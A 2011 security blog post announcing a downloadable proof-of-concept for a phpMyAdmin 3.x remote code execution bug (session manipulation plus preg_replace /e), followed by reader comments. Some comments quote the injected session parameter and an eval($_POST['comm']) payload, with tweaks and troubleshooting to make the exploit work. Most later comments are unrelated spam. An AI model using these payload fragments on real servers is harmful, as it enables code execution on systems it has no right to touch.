( ~~~ )
  ))^ ^((
 ((* - *))
   _) (_
 / '--' \     ^
//(_  _)\\   /_\
\\ )__( //   .'
 (( v  ))   (
   \| /\     '-.
    K(  \       )
    |\\  '-._.-'
    ||\\
  *_-P/,P
     '-
Want your PHP application manually audited? Check out Xxor AB's PHP Security Auditing Service

Friday, July 8, 2011

phpMyAdmin 3.x preg_replace RCE POC

I'm flooded with requests for a POC and many doubt that these vulnerabilities are exploitable. And since this vulnerability is rather technically interesting I believe many could learn from it.

The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace as detailed in my last blogpost. It will only confirm if the instance is exploitable or not and you need to have valid credentials to the database. Use responsibly.

Download here


Edit:As 0x6a616d6573 reminded me of, blogger removes "%00" if not carefully encoded. The code posted where messed up due to this. (The downloadable file where still fine)
Now it's fixed. I also added the "//" as suggested.

51 comments:

  1. It doesn't Work It show me
    [i] Running...
    [*] Contacting server to authenticate.
    [i] Cookie:pma_mcrypt_iv=6usxi8fDjxY%3D; phpMyAdmin=83f941377c2ad368cb065ae3511c114b6ce908d7; pmaUser-1=K6%2BMQV0L8oo%3D; pmaPass-1=C7ohzD7vwAc%3D
    [i] Token:e498413730bbb8c51ce127b807160bf8
    [*] Contacting server to poison some _SESSION variables.
    [*] Contacting server to execute command.
    [!] Authentication error. Wrong password maby.
    [*] Exiting...

    I use PMA V 3.4.3 PHP 5.3.5 On OSX

    ReplyDelete
  2. @Anonymous

    I'll debug tomorrow. It would be helpfull if you edited the code and changed $debug to true and emailed me the output to h@xxor.se

    ReplyDelete
  3. @Mango: I appreciate the PoC, and I did learn something. I learned I should have spent more time trying to exploit this bug. lol :] Nice work!

    Also, to get the PoC working reliably, I simply added a uri encoded null byte at the end of the regex string, and a comment delimiter at the end of the injected PHP code (The null is not needed there BTW):

    '&_SESSION[src_uncommon_tables][0]=||/e'.

    Becomes

    '&_SESSION[src_uncommon_tables][0]=||/e'.

    And

    '\`.eval($_POST["comm"]);'."\x00" :

    Becomes

    '\`.eval($_POST["comm"]);//'."\x00" :

    ReplyDelete
  4. Apparently blogger eats url encoded nulls for breakfast, but I think you know what I mean from the description.

    ReplyDelete
  5. Just tested with version 3.3.9.2 (Unsuccessful) and Tried 0x6a616d6573's ['\`.eval($_POST["comm"]);//'."\x00" :]

    Result of execution:
    [i] Running...
    [*] Contacting server to authenticate.
    [!] Fail. request returned 401. The host is not vulnerable or there is a problem with the supplied url.
    [*] Exiting...
    -------------

    Being that -u is set to https

    ReplyDelete
  6. @Anon: Try echo'ing out the $result variable to see if that can give you some insight into how the 401 error is happening. Also, the null at the end of the php code isn't necessary. I don't know if that's the problem, but give it a go, and let us know how it works?

    @Mango: Have you looked into the possibility of authentication bypass since $_SESSION variables can apparently be overwritten? I realize the authentication within phpMyAdmin happens on two different layers, (Application, and SQL) but bypassing phpMyAdmin application specific authentication should suffice for a preauth remote code execution condition. What do you think?

    ReplyDelete
  7. @0x6a616d6573
    As I remember, the authentication can be bypassed without modifying the session. But I came to the conclusion that the code inevitably comes to some place where it needs a valid connection to the database before it hits any funny pieces of code.

    But please, if you can find something, tell me. =D

    ReplyDelete
  8. Last Anon.

    Debug = 1

    http://www.pastie.org/private/66hsny5mrc8xw27dgsuitw

    ReplyDelete
  9. @Anonymous

    Your server uses basic authentication. Use an url like this:
    https://user:pass@db.xxxxxxxxxx.com:443/phpmyadmin

    I don't know if these credentials are the same as your db credentials.

    ReplyDelete
  10. Can u show me LFI Bug PoC

    ReplyDelete
  11. great work man!
    it took me a while to fully understand all this, but now it's clear!:)
    Congrats for the hard work!

    ReplyDelete
  12. Download link does not work anymore :-(

    ReplyDelete
  13. https://www.facebook.com/bantalsilikongrosir
    http://bantalsilikon01.blogspot.com/2014/12/a.html
    http://jualsangkarpleci.blogspot.com/2014/12/a.html
    http://kopiluwakliar01.blogspot.com/2014/12/a.html
    http://vvty.in/uncategorized/marinir-seo/

    http://marinirseo.blogspot.com/2014/12/a.html
    http://marinir-seo.blogspot.com/2014/12/a.html
    http://bumbu-pecel-malang.blogspot.com/2014/12/a.html
    http://distro-seo.blogspot.com/2014/12/a.html
    http://restoran-seo.blogspot.com/2014/12/a.html
    http://bantalmalangmurah.blogspot.com/2014/12/a.html
    http://distrobantal.blogspot.com/2014/12/a.html
    http://kesethandukmalang.blogspot.com/2014/12/a.html


    http://tasya.marinirseo.web.id/?p=4http://jeannet.marinirseo.web.id/?p=4http://anne.marinirseo.web.id/?p=4http://jelita.marinirseo.web.id/?p=4http://ruth.marinirseo.web.id/?p=4http://caca.marinirseo.web.id/?p=4http://brenda.marinirseo.web.id/?p=1 || http://tasya1.marinirseo.web.id/?p=4http://jeannet1.marinirseo.web.id/?p=4http://anne1.marinirseo.web.id/?p=4http://jelita1.marinirseo.web.id/?p=4http://ruth1.marinirseo.web.id/?p=4http://caca1.marinirseo.web.id/?p=5http://brenda1.marinirseo.web.id/?p=4 || http://tasya2.marinirseo.web.id/?p=5http://jeannet2.marinirseo.web.id/?p=4http://anne2.marinirseo.web.id/?p=4http://jelita2.marinirseo.web.id/?p=4http://ruth2.marinirseo.web.id/?p=4http://caca2.marinirseo.web.id/?p=4http://brenda2.marinirseo.web.id/?p=4http://brenda3.marinirseo.web.id/?p=4http://tasya3.marinirseo.web.id/dua/http://jeannet3.marinirseo.web.id/?p=4http://anne3.marinirseo.web.id/?p=4http://jelita3.marinirseo.web.id/?p=4http://ruth3.marinirseo.web.id/?p=4http://caca3.marinirseo.web.id/?p=4 || nhttp://brenda4.marinirseo.web.id/?p=4http://tasya4.marinirseo.web.id/?p=4http://jeannet4.marinirseo.web.id/?p=4http://anne4.marinirseo.web.id/?p=4http://jelita4.marinirseo.web.id/?p=5http://ruth4.marinirseo.web.id/?p=4http://caca4.marinirseo.web.id/?p=4 || http://tasya5.marinirseo.web.id/?p=4http://anne5.marinirseo.web.id/?p=4http://jelita5.marinirseo.web.id/?p=4http://ruth5.marinirseo.web.id/?p=4http://caca5.marinirseo.web.id/?p=4http://synganne.marinirseo.web.id/?p=4
    http://tasya.marinirseo.web.id/?p=4http://jeannet.marinirseo.web.id/?p=4http://anne.marinirseo.web.id/?p=4http://jelita.marinirseo.web.id/?p=4http://ruth.marinirseo.web.id/?p=4http://caca.marinirseo.web.id/?p=4http://brenda.marinirseo.web.id/?p=1 || http://tasya1.marinirseo.web.id/?p=4http://jeannet1.marinirseo.web.id/?p=4http://anne1.marinirseo.web.id/?p=4http://jelita1.marinirseo.web.id/?p=4http://ruth1.marinirseo.web.id/?p=4http://caca1.marinirseo.web.id/?p=5http://brenda1.marinirseo.web.id/?p=4 || http://tasya2.marinirseo.web.id/?p=5http://jeannet2.marinirseo.web.id/?p=4http://anne2.marinirseo.web.id/?p=4http://jelita2.marinirseo.web.id/?p=4http://ruth2.marinirseo.web.id/?p=4http://caca2.marinirseo.web.id/?p=4http://brenda2.marinirseo.web.id/?p=4http://brenda3.marinirseo.web.id/?p=4http://tasya3.marinirseo.web.id/dua/http://jeannet3.marinirseo.web.id/?p=4http://anne3.marinirseo.web.id/?p=4http://jelita3.marinirseo.web.id/?p=4http://ruth3.marinirseo.web.id/?p=4http://caca3.marinirseo.web.id/?p=4 || nhttp://brenda4.marinirseo.web.id/?p=4http://tasya4.marinirseo.web.id/?p=4http://jeannet4.marinirseo.web.id/?p=4http://anne4.marinirseo.web.id/?p=4http://jelita4.marinirseo.web.id/?p=5http://ruth4.marinirseo.web.id/?p=4http://caca4.marinirseo.web.id/?p=4 || http://tasya5.marinirseo.web.id/?p=4http://anne5.marinirseo.web.id/?p=4http://jelita5.marinirseo.web.id/?p=4http://ruth5.marinirseo.web.id/?p=4http://caca5.marinirseo.web.id/?p=4http://synganne.marinirseo.web.id/?p=4

    ReplyDelete
  14. I enjoy, result in I found exactly what I used to be looking for. You’ve ended my 4 day long hunt! God Bless you man. Have a nice day. Bye
    Regards too from Young Entrepreneur
    Tangki Fiberglass
    Jual Septic Tank

    ReplyDelete
  15. free hamachi alternative http://www.techfreetricks.com/top-5-hamachi-alternatives-virtual-lan-gaming/ Hamachi has been around for a long time now and is the most favored decision of numerous gamers over the globe. That being stated, Hamachi comes with its own particular downsides. free hamachi alternative

    ReplyDelete
  16. I will always support your website, hopefully more advanced. keep the spirit… thanks

    ReplyDelete
  17. These training concentrate on the technologies and skills required to be a data scientist like Machine learning, SAS, Tableau, Python, R and many more. data science course syllabus

    ReplyDelete
  18. Wow what a Great Information about World Day its exceptionally pleasant educational post. a debt of gratitude is in order for the post.
    data science course in India

    ReplyDelete
  19. This is a wonderful article, Given so much info in it, Thanks for sharing. CodeGnan offers courses in new technologies and makes sure students understand the flow of work from each and every perspective in a Real-Time environment Augmented reality course in vijayawada. ,

    ReplyDelete
  20. Are you also searching for spanish nursing writing services we are the best solution for you. We are best known for delivering the best services to students.  

    ReplyDelete
  21. cool blog, cool post, very interesting, it would be cool if a large number of people have to find out, and it will help to increase coverage in social networks https://soclikes.com/

    ReplyDelete
  22. Your blogs are great.Are you also searching for Pico assignment? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.

    ReplyDelete
  23. I love this. It is soo informative. Are you also searching for Swedish assignment writing help we are the best solution for you. We are best known for delivering the best services to students without having to break the bank

    ReplyDelete
  24. Your blogs are great.Are you also searching for Nursing Writing Services? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.

    ReplyDelete
  25. Your blogs are great.Are you also searching for Nursing Writing Help? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.

    ReplyDelete
  26. Good blog.Are you also searching for Help With My Nursing Paper? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.

    ReplyDelete
  27. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    Scrum master certification
    csm certification

    ReplyDelete
  28. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    certified scrum master certification
    agile scrum master certification

    ReplyDelete
  29. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    csm training
    Scrum master Training

    ReplyDelete
  30. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    certified scrum master
    Scrum master

    ReplyDelete
  31. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    Best Scrum master certification
    scrum master certification cost

    ReplyDelete
  32. Thanks for sharing this.,
    Leanpitch provides online training in Scrum Master, everyone can use it wisely.
    Join Leanpitch 2 Days CSM Certification Workshop in different cities.

    Scrum master certification

    csm certification cost

    ReplyDelete
  33. Excellent content ,Thanks for sharing this .,
    Leanpitch provides online training in CSPO, everyone can use it wisely.

    Product owner certification
    Product owner training

    ReplyDelete
  34. This comment has been removed by the author.

    ReplyDelete
  35. The next stop is AtozTopNews. This website is up-to-date with the latest tech news, reviews of the most modern consumer technology, and advice on purchasing technology. There's also a distinctive "How To" section which includes blog posts written to consumers with their purchases, such as "How do you watch Star Wars movies in order '' We love it.

    ReplyDelete
  36. Tamiloneindia is a professional web-based destination providing complete media coverage of mainstream and independent movies, the latest on the movie going experience, and the connection between Hollywood and the audience. We only cover theatrically released films, and updates from film festivals all over the world. Follow us to keep up with the latest movie trailers, interviews, reviews, hype, and everything about the cinematic experience straight from Hollywood and beyond.

    ReplyDelete
  37. We visit, play, use and play on each casino we promote and share our findings and experiences with you. We sort out the best from the rest and only feature fully licensed UK casino operators in regulated markets across the United Kingdom. All featured casinos on E-Vegas.com are remotely licensed with either MGA ( Malta Gaming Authority ) or ( AGCC ) Alderney Gambling Control Commission or appropriate UK governing body.UK Live Casino

    ReplyDelete
  38. I feel very grateful that I read this. It is very helpful and very informative and I learned a lot from it.
    For hand grip strengthener please contact with squegg.

    ReplyDelete
  39. Thank you for another informative blog. Where else could I get that type of info written in such a perfect approach? I have an undertaking that I’m simply now working on, and I’ve been on the lookout for such information.

    ReplyDelete
  40. D&P PERFUMUM IMPORT EXPORT INDUSTRY AND TRADE LIMITED COMPANY WERE ESTABLISHED IN ANKARA IN 1999 AND STILL 40+CONTINUES ITS ACTIVITIES AS D&P PERFUME SHOP. IMPORT EXPORT INDUSTRY AND JOINT STOCK COMPANY. UNITED STATES THE BEST ONLINE PERFUME STORE IN TEXAS SAN ANTONIO OUR COMPANY, WHOSE MAIN FIELD OF ACTIVITY IS Best Perfume Collection, WORKS INTENSIVELY ON PERFUME IN PARALLEL WITH ITS IDENTITY AS “THE PERFUMER OF THE COUNTRY.”

    ReplyDelete
  41. Ignition Casino’s slot machines are truly mind-blowing, boasting selection of|quite so much of|a wide range of} options where they’ve chosen to give attention to} quality quite than quantity. You stand an opportunity to win it massive with their progressive slots and jackpots too. Super Slots is your finest guess if you’re in search of a 카지노사이트.online bit of recreation selection and a fantastic choice of on-line slot machines from the leading software providers within the business. This web site options over a hundred and twenty actual cash slot video games you could play for free if you nonetheless wish to test them out. To spare you the difficulty, we’ve narrowed down a listing of exciting on-line slot machines and essentially the most best on-line casinos where you'll find every of them.

    ReplyDelete